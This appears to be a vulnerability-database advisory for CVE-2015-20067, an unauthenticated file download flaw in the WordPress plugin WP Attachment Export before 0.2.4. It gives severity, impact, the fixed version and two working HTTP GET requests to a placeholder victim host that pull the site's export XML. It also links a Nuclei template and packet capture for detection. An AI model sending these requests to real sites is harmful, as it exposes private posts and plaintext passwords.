🔙 목록으로 돌아가기

CVE-2015-20067: WP Attachment Export < 0.2.4 - Unrestricted File Download

TitleWP Attachment Export < 0.2.4 - Unrestricted File Download
Authorr3Y3r53
SeverityHigh
ImpactUnauthenticated attackers can download XML files containing sensitive attachment and post metadata including titles, author IDs, email addresses, and plaintext passwords for password-protected posts, potentially exposing confidential information and credentials from the WordPress site.
RemediationFixed in 0.2.4
CVSS Score7.5
EPSS Score0.19119
CVE IDCVE-2015-20067
CWE IDCWE-862
Tags wpscan packetstorm seclists cve cve2015 wordpress wp wp-plugin unauth wp-attachment-export wp_attachment_export_project vuln

🔍 Vulnerability Description

The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.

🌐 HTTP Request

GET /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-admin/tools.php?content&wp-attachment-export-download=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-20067.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-20067.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A